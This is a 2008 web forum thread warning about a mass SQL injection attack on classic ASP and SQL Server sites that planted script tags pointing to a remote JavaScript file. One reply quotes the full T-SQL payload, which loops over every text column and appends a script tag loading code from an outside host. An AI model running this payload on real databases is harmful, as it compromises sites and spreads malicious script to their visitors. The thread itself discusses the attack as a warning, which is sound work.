|
|||||||||
|
|||||||||
| |||||||||
|
|||||||||
|
|||||||||
| |||||||||
|
|
|
| |||||||||
 |
|
|
«
Previous Thread
|
Next Thread
»
|
Thread Tools | Search this Thread | Rate Thread | Display Modes |
Dev Shed Forums Sponsor:
|
|
A high performance database engine using optimized data access for all development environments including Delphi, Visual Studio .NET, Visual Basic, Visual FoxPro. and more. Learn More |
|
#1
April 15th, 2008, 09:49 AM
|
|||
|
|||
|
WARNING - SQL injection attack going around
This morning I found one of our company web stores is lagging. Turns out it's because there are all these <script> links leading to aspder.com.. pointing at a file called "1.js".. and that site is currently down.
Looks like we got hacked. I did a Google search for aspder.com and TONS of other stores have that script tag inserted into their product data. Anyone know anything about this? Is this a vulnerability in our store software or is it a vulnerability in Microsoft's stuff somehow? (Win2003 Server, SQL Server 2005, IIS 6, ASP classic). Any info would be appreciated!
|
|
#3
April 15th, 2008, 01:49 PM
|
||||||
|
||||||
|
Here's a link to another forum with more info:
http://www.webhostingtalk.com/showthread.php?t=686032 It is an sql injection attack targeted at sql server and asp, but you'd have to leave your site pretty open to be vulnerable. Page 2 of that link shows the actual sql executed: Code:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.aspder.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
As to the question: I'd put the blame more on the store stuff. The programmers should know better than to send unfiltered input to a database.
__________________
Primary Forums: .Net Development, MS-SQL, C Programming VB.Net: It's not your father's Visual Basic. [Moving to ASP.Net] | [.Net Dos and Don't for VB6 Programmers]
|
|
#5
April 15th, 2008, 03:54 PM
|
||||
|
||||
|
Quote:
It also seems like his attack might have worked too well. The main reason people seem to be noticing is that things are starting to lag. Whoever wrote this seems to be ddos-ing themselves out of business. -MBirchmeier
__________________
I have noticed that the devshed spell check sugggests that MBirchmeier is a misspelling for 'bitchier'. Apparently even computers have freudian slips. 0x4279 7465 204D 6521
|
|
#6
April 15th, 2008, 04:03 PM
|
||||||
|
||||||
|
I wonder what www.aspdr.com's page rank will be after this? The attack is certainly finding no shortage of poorly coded sites to create the links, most of them are legitimate and a few will have a decent page rank of their own.
|
|
#8
April 25th, 2008, 01:12 PM
|
||||
|
||||
 Obligatory plug for xkcd.com, from the /. art
__________________
--Ax without exception, there is no rule ... The great thing about Object Oriented code is that it can make small, simple problems look like large, complex ones  09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 Some people, when confronted with a problem, think "I know, I'll use regular expressions." Now they have two problems. -- Jamie Zawinski
|
|
#9
April 25th, 2008, 07:42 PM
|
||||
|
||||
|
Professional must protect against sql injections. And they need to keep up with the security press. This is not new, its just the current one.
Its an arms race. Get used to it. Someone will do a better job about 'eternal vigilance' as a necessity.
|
|
| Viewing: Dev Shed Forums > Other > Dev Shed Lounge > WARNING - SQL injection attack going around |
| Thread Tools | Search this Thread |
| Display Modes | Rate This Thread |
|
|
|
 |
|
|
Del.icio.us
Digg
Google
Spurl
Blink
Furl
Simpy
Y! MyWeb
Linear Mode
